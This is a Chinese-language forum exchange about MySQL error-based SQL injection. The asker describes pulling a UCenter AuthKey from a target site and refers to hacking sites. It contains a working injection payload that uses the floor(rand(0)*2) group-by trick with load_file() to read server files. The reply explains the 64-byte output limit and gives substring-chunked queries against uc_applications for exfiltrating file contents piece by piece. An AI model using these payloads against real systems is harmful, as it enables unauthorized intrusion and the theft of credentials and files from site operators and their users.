關(guān)于Mysql報(bào)錯(cuò)注入的幾個(gè)問題

No.1：Mysql報(bào)錯(cuò)注入最多能夠顯示多少字節(jié)呢？我Inject到的UC的AuthKey爆出62位一共應(yīng)該64位

No.2:爆出的用戶名中文和特殊符號(hào)顯示亂碼，用Hex()轉(zhuǎn)換了下爆出來(lái)再轉(zhuǎn)回去的時(shí)候依然亂碼,怎么解決？你知道國(guó)內(nèi)很多SB愛用各種怪異的符號(hào)做用戶名,嚴(yán)重影響日站的進(jìn)度。。

No.3：能否用報(bào)錯(cuò)注入Load_File(),我沒有成功語(yǔ)句如下：

and (select 1 from(select count(*),concat((select (select load_file(0x.........)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

1. 64 位，但是許多報(bào)錯(cuò)注入都會(huì)在前后加上特別符號(hào)，以方便分辨，如[]，就變成62位了，可以使用substring來(lái)處理

2. 如圖：

3. 同樣使用substring 以64為1單位慢慢讀, 最好就是寫個(gè)循環(huán)來(lái)讀

Select concat(substring(load_file(0x....),1,64)) FROM uc_applications limit 0,1

Select concat(substring(load_file(0x....),65,64)) FROM uc_applications limit 0,1

Select concat(substring(load_file(0x....),129,64)) FROM uc_applications limit 0,1